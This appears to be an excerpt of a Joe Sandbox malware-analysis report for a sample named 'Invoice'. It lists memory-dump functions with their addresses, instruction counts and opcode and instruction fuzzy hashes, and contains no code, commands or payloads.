Uniqueness Score: -1.00%

Function 066955D0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 275b48590899a404f2ed0e346ec00954bdcc2ed8b02e6085decb5a21b72f1b3f
Instruction ID: 60b9b7aaa1347863c7759473afe563524d3182b4e76a58e73ea2744a85471c5e
Opcode Fuzzy Hash: 275b48590899a404f2ed0e346ec00954bdcc2ed8b02e6085decb5a21b72f1b3f
Instruction Fuzzy Hash: DC519670E002058FDF61CB69C490ABEBBBAEB45320F24C469E546DB391C635E942CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06695452 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9cdbd04ff4566f7c25ced3003017aeb2e30e392c698d93a9f18e3b4f9621dcf
Instruction ID: 2fb69bd63d264aa7d31a3c52a33c3b025b0a552326e8a8b66e2e95e537ff8421
Opcode Fuzzy Hash: a9cdbd04ff4566f7c25ced3003017aeb2e30e392c698d93a9f18e3b4f9621dcf
Instruction Fuzzy Hash: 7F418371E002099FCF71CEA9D880AAFFBBAFB45310F10492AE556D7651D330E955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06696499 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fc0ba1b0e30d9b5679395f0a4075b726aa4b1dfc86609ae196f0cb4b6c6d83
Instruction ID: 96b0d1e4f129f39e86efa624f112fdf1fc5e7d489c92d397ab3f6d90e5473466
Opcode Fuzzy Hash: d9fc0ba1b0e30d9b5679395f0a4075b726aa4b1dfc86609ae196f0cb4b6c6d83
Instruction Fuzzy Hash: AF315A71D05359AFDF10CFA9D881BDEBFB8AB09214F14816AE808E7341D375A904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06692080 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5d8d745fffa6a215b006e1446670588d811c8a00729215c7c0a9f3c894e9ac
Instruction ID: fc61e2844292796db5510dbde155c7985ec2cdd671d0df965b4f30cb90658bdb
Opcode Fuzzy Hash: 5e5d8d745fffa6a215b006e1446670588d811c8a00729215c7c0a9f3c894e9ac
Instruction Fuzzy Hash: 0731B630E10205ABDF59CF64D96469FB7BAFF89300F108429E905E7354DB71AD52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E11039 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3407e6909dd400df4d4ec0622bcfacdcb6e895ecd5e29cb9bcc6d08c357adf37
Instruction ID: d8c4152101e21b9a2ec1433a4a3cec1c13811de913302eb4371f46cb588f3c52
Opcode Fuzzy Hash: 3407e6909dd400df4d4ec0622bcfacdcb6e895ecd5e29cb9bcc6d08c357adf37
Instruction Fuzzy Hash: 59319E30A002158FCF55EB78D880AAEBBF5EF89314F108969E506EB365DB35AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E11048 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d040fe5e1d09b26c442435b01a8aef0653a23285d4d59bff05cdd675a3d8029
Instruction ID: 7b12f07d894caa338e45ec862c48267798c8fc56a8c5cfbb8eb9f71752a3d722
Opcode Fuzzy Hash: 2d040fe5e1d09b26c442435b01a8aef0653a23285d4d59bff05cdd675a3d8029
Instruction Fuzzy Hash: D231AD30A002158FCF50EF78D880AAEB7F5EF89314F104969E506EB364DB35AD82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E10817 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b6e51a5002b7f66902d8bb2583c41cd78ce2400192794af727947c7b5599d7
Instruction ID: 754aa14fc716f056c915fa8823097c86efe6c931fdee2193bc43409087cc6ca2
Opcode Fuzzy Hash: a2b6e51a5002b7f66902d8bb2583c41cd78ce2400192794af727947c7b5599d7
Instruction Fuzzy Hash: D3416C30A047098FCB15DFA9C4906DDBBF1EF89310F14D659E459BB262EBB0A9C5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06692090 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3053fb33a3571d50a761f1b01a16a673d2f2efb986f133acc145b87f02eb7c
Instruction ID: 39d080bb5f22704251a0f416b26f8cfb66c7753525aa21f55cde7ce3c9956b68
Opcode Fuzzy Hash: 9e3053fb33a3571d50a761f1b01a16a673d2f2efb986f133acc145b87f02eb7c
Instruction Fuzzy Hash: 6D318330E10205ABDF59CF64D96469EB7BAFF8A300F10C929E906E7354DB71AD52CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06693EE1 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa8bebc98e432f8824bcc41eed5c44fdef80634c98fc460562b226d624c520f
Instruction ID: d67c8facf71b0cfb2998ea2aa8a297e21b1c0c55054c6c73107cd16c74260fbd
Opcode Fuzzy Hash: 1fa8bebc98e432f8824bcc41eed5c44fdef80634c98fc460562b226d624c520f
Instruction Fuzzy Hash: C421D135F112159FDB11CFA8D940AAEBBF5EB88320F148065E805EB355E731D8128BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06696D30 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d7b4e2ece8551f6dfd0ce30e435b1eb6f6d1e32020b4f0449d4c04ffd7a724
Instruction ID: c1045542570a9fbc0091178835d7d930f4a6090dda25ad53eb5e10b039f5fd17
Opcode Fuzzy Hash: f0d7b4e2ece8551f6dfd0ce30e435b1eb6f6d1e32020b4f0449d4c04ffd7a724
Instruction Fuzzy Hash: A1210770B101189BDF44DB68E950A9EBBBEEB85320F244425E805E7355DB319C418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 06693EF0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70a03e388728fe5e2939016fe8295947ef62da63c445fe57b49d7156a932638
Instruction ID: fce040578e4987af01b500c92448c3d2afcab383dc9806749da77a5ab7e8c6cf
Opcode Fuzzy Hash: c70a03e388728fe5e2939016fe8295947ef62da63c445fe57b49d7156a932638
Instruction Fuzzy Hash: 8821BD75F016159FDF50DFA9D980AAEBBF5FB88320F148066E905E7354EB30D9018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06693491 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631b279ec9e14be59b21380950cb4abd7e695de5fb602fe381feea4fe2395cef
Instruction ID: 7bf9f8e12a36006e3ad953237d7a79c528c2a6e142f75f94c3abd62fb8364a8b
Opcode Fuzzy Hash: 631b279ec9e14be59b21380950cb4abd7e695de5fb602fe381feea4fe2395cef
Instruction Fuzzy Hash: 0221A271E012249BCF64DBB8DD819EEB7F9EB89310F109569E406FB341DA319941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35bbc59ccf8f9035c5fa61fef869139326670cc6050846a5b62a9de23d0f9370
Instruction ID: d13f70e65910d0277f2327be694f2837b8f670bc066174a6a17d606e92704c88
Opcode Fuzzy Hash: 35bbc59ccf8f9035c5fa61fef869139326670cc6050846a5b62a9de23d0f9370
Instruction Fuzzy Hash: B22107B1508204DFCB18CF24EDC8B26BF66FB84718F24C96DE9495B251C736D846DE61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e997d26ae589ad0a323692637b0d2a8e1f51df62d0560d4a3c88e53690caa799
Instruction ID: 397aa8306f8c9f7c06f32435a1de0d945becc94c537d1cb0f2450a81c37f2e15
Opcode Fuzzy Hash: e997d26ae589ad0a323692637b0d2a8e1f51df62d0560d4a3c88e53690caa799
Instruction Fuzzy Hash: 152138B1508244DFDB05DF14EDC8B27BFA5FB84324F24C569E8492B251C376D806CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676d529c1f82ebdb29ea621a40b2eeaad6586c8c9495d0f9d955045f16db005f
Instruction ID: aeafa44e806c7ac4897c749c7b37336ddb40431a66eaabbd33976ae0c2c84d6d
Opcode Fuzzy Hash: 676d529c1f82ebdb29ea621a40b2eeaad6586c8c9495d0f9d955045f16db005f
Instruction Fuzzy Hash: 532107B5508204DFCB04DF14E9C8B26BF65FB84318F24C56DE9195B296C376E846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D12C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd806193377538733666400ffeecff47e509f960759a8d676d2eb73cc74d389
Instruction ID: 2ac99d589d7b14f794915171833949f7714ccb57be5417016ccf45611d62da6b
Opcode Fuzzy Hash: ccd806193377538733666400ffeecff47e509f960759a8d676d2eb73cc74d389
Instruction Fuzzy Hash: 0E2126B1509240DFDB14DF14EDC8B26BFA6FB84318F20C66DE9095B251C336D846C661

Uniqueness

Uniqueness Score: -1.00%

Function 0669F980 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f250efb6244e4e548e9344234d6c1010412295b5536b9ca4860d1264ef67a06
Instruction ID: 2c63c60d76a57c7f4e28723a3f5ed09f1fa606135901af85a62090ed9dd0a1e6
Opcode Fuzzy Hash: 6f250efb6244e4e548e9344234d6c1010412295b5536b9ca4860d1264ef67a06
Instruction Fuzzy Hash: 17112931B201145BEF6066BCC89572F669EDB86710F11482BEA0AD7395CD78CC4143F2

Uniqueness

Uniqueness Score: -1.00%

Function 00E10B6F Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418a7c7bb5392a8dfb5b1c24b4e1f06de6b0df52745b6eab32ff43b1bd6a98bb
Instruction ID: 094cc287363580dc8d8c76eed5386425d04bfbf447c00968543c979b66bd196d
Opcode Fuzzy Hash: 418a7c7bb5392a8dfb5b1c24b4e1f06de6b0df52745b6eab32ff43b1bd6a98bb
Instruction Fuzzy Hash: F631CEB0C01218DFDB24CF99C989BDEBBB5AB48314F24911AE408BB280C7B55885CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E10B70 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70d03123580204beb4651fa72559d7f2c3212dea65d3672f7c186ce842b6a5e
Instruction ID: d92ee188aa09ba03c3a862fbeb82b9eb1fb8213120b381f89a17435c7743778a
Opcode Fuzzy Hash: c70d03123580204beb4651fa72559d7f2c3212dea65d3672f7c186ce842b6a5e
Instruction Fuzzy Hash: 7B31AEB0C01218DFDB24DF99C989BDEBBB5AB48714F24951AE408BB240C7B56985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0669F990 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143247dcc1f8d61404e1d83d83901f74323d06872d03ad65d1db5fcdf38475c7
Instruction ID: b5e091353704291502692d236a8db5edfb9b7f62efdb62114d2bdcd605bf0e3e
Opcode Fuzzy Hash: 143247dcc1f8d61404e1d83d83901f74323d06872d03ad65d1db5fcdf38475c7
Instruction Fuzzy Hash: 1F018460F2012457EF6426FDD89572F108ED7C9751F22482BEA0AD7395CD69CC8213F2

Uniqueness

Uniqueness Score: -1.00%

Function 06694237 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d493071748730137154889fe5540a71e18a9d271cd731852446dc4cdf414dcb6
Instruction ID: 304b72643d079aa4b925894b6c297f122fcdde558d0b3bd7f0a7a3ca1ca3c630
Opcode Fuzzy Hash: d493071748730137154889fe5540a71e18a9d271cd731852446dc4cdf414dcb6
Instruction Fuzzy Hash: 1B01D231B002101BDF6596BCD800B6BA7DBEBC6320F24883AF50AD7395DE65DC4243A1

Uniqueness

Uniqueness Score: -1.00%

Function 06694000 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a934100288b1ed668396dbf51506232482ee39fd99bcc689eeb5a4c5557d8d
Instruction ID: 0fce3fc62a6cb7c97c1250a2b2fc2efdbbcd9ea63b369504e7b270f0dda69924
Opcode Fuzzy Hash: 68a934100288b1ed668396dbf51506232482ee39fd99bcc689eeb5a4c5557d8d
Instruction Fuzzy Hash: 98118B31B101298FDF54DB68D9106AF73EBEBC8211B008539D90AE7358EE25DC028BE2

Uniqueness

Uniqueness Score: -1.00%

Function 06693CBA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e53b959c6966d233d170b384720e1c2b3213107721214f7114df441dfbe4ed
Instruction ID: 907e9a8556527035e6c79aa1515f99f01c9bbae9ccd068866e9e5a619a71edb7
Opcode Fuzzy Hash: 90e53b959c6966d233d170b384720e1c2b3213107721214f7114df441dfbe4ed
Instruction Fuzzy Hash: 7121E5B5C01259AFCB00CF9AD985ACEFFB8FB49320F10852AE918B7300C3746944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0669F1BA Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6375a5739143732f7914de439cba6e17a2f964e15071d8700b237c0ddad231d6
Instruction ID: fd178134ee2f86af61e62e3db17fa2b4d436a6523816515d662bdd72f0be0081
Opcode Fuzzy Hash: 6375a5739143732f7914de439cba6e17a2f964e15071d8700b237c0ddad231d6
Instruction Fuzzy Hash: FC01F531B081500FCF5696FCD450B2BB7EADBCB620F19887AE509CB351D965CC4283A1

Uniqueness

Uniqueness Score: -1.00%

Function 06693FF1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16206d7dfdfe813140c20830523e06dd36b4a27fe7bd6ac0ece09e68b4d5d111
Instruction ID: 21cf9a25a86a2260ec87a2eb117f0a211d58c27be4c648fe8d7d18b041a97e24
Opcode Fuzzy Hash: 16206d7dfdfe813140c20830523e06dd36b4a27fe7bd6ac0ece09e68b4d5d111
Instruction Fuzzy Hash: BC01BC31B100255BDF589A68ED106ABB7EFEBC8211F044579E906D7398EE21880347E2

Uniqueness

Uniqueness Score: -1.00%

Function 0669A328 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8132c048c2af5d2996f0acc83584f4955923d3096e100c8f4d8ca84770cf26
Instruction ID: 9487e6ba9fdaa6e66c155a9d3cf403143067bef726108cdd79b5096cfe17f225
Opcode Fuzzy Hash: bd8132c048c2af5d2996f0acc83584f4955923d3096e100c8f4d8ca84770cf26
Instruction Fuzzy Hash: 2901F730B045101FCB52D7BCD450B2F77EAEB86720F208879E50ADB355DE25DC028791

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction ID: e2805e12c7da653b7eb1ec6703574082235dcead078564388c0867e141f55793
Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction Fuzzy Hash: 4C11B275508284CFDB12CF14D9C4B56FFB1FB84328F24C6AAD8495B656C33AD84ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: aa92af0354b21ed5f928c8838ae7367c395a5c0b081384d3a1e8fab289716aea
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 11119075508240DFDB15CF14E9C4B15FF72FB44318F24C6AAD8494B656C33AE85ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 3422b0ffaf272577e5ee84fab1f2c6abd48e255cdff5b45889a2db8765bd342a
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: BE119075508244DFDB15CF14D9C4B16FF62FB84318F24C6A9D8494B656C33AD84ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 06693CC0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24053c761431cda1a7aaf74c8367ca21e42b071944bc5540c9c48a74109371dc
Instruction ID: 8926843f3604db74cc63accb4fb781d3df9e1cc866ca4d921309e75f69fda3f8
Opcode Fuzzy Hash: 24053c761431cda1a7aaf74c8367ca21e42b071944bc5540c9c48a74109371dc
Instruction Fuzzy Hash: 3D11C2B5D00259AFCB00DF9AD884ACEFBB8FB48310F10852AE918B7340C374A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D127 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4152023875.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
Instruction ID: b637d9697da84cb384b73c7ef8935bd76f155610d6886472d63162ce82fd865c
Opcode Fuzzy Hash: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
Instruction Fuzzy Hash: 2D119D75508280CFDB15CF14D9C4B25BFA2FB84318F24C6ADD8494B666C33AD84ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 06694248 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d954ce88c96f40d2f9e56ac075c43cad99d66a90cf9286965ec242373679600
Instruction ID: e61ca88b6f1366462895510cd0b33f09b14992c9b9fb31aab0287e1d342500c8
Opcode Fuzzy Hash: 5d954ce88c96f40d2f9e56ac075c43cad99d66a90cf9286965ec242373679600
Instruction Fuzzy Hash: E401D130B000100BDF6596BDD400B2BA3DBEBC9720F24883AE90AD7398DD61DC0347A1

Uniqueness

Uniqueness Score: -1.00%

Function 0669F1C8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5f6aa28a026e8e7e479cd3893c9c9c2bbd74d2c8993f0db1711a3391c1beae
Instruction ID: 4ce875abfb0e0fbca12388d03ace148400733c6a286ff5692c6fdb11902f639e
Opcode Fuzzy Hash: bc5f6aa28a026e8e7e479cd3893c9c9c2bbd74d2c8993f0db1711a3391c1beae
Instruction Fuzzy Hash: FF01DC34B000100BDF6596BCE850B2FA3DADBCA720F20883AE90AC7340DE71DC0243A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E10748 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaac5b9fbfc991b984daf539ef516963e0cbc76574d3e5e70bcaa5d07368914e
Instruction ID: 071987d56aba3fa1b7b54dff8e607fba390fffb9a0e08587644b1dcff62b9b23
Opcode Fuzzy Hash: eaac5b9fbfc991b984daf539ef516963e0cbc76574d3e5e70bcaa5d07368914e
Instruction Fuzzy Hash: 391136B5C002488FCB10DF9AD485BDEFBF4EB58320F24841AD419A7340D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0669A338 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2243c40b238e63699f32236bf08e743d2964c4eb3fd732ef9b520823862638e0
Instruction ID: 0eebfa8076e163257389da8c5abde60d594aa8e3843f30d6dc11717ea1e5cdd5
Opcode Fuzzy Hash: 2243c40b238e63699f32236bf08e743d2964c4eb3fd732ef9b520823862638e0
Instruction Fuzzy Hash: 8F014430B105145FDF55E6BCE454B2F73DAEB86720F208939E50AD7354DE25DC424791

Uniqueness

Uniqueness Score: -1.00%

Function 00E2D8C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151862207.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73b8338e8be2a27950630fec3d13c4135fe840d12be90d288a42c4297e58496
Instruction ID: 692afa178fd1220d6a42c8a54d36a27551f9274812d95a35adedd0460749b9cc
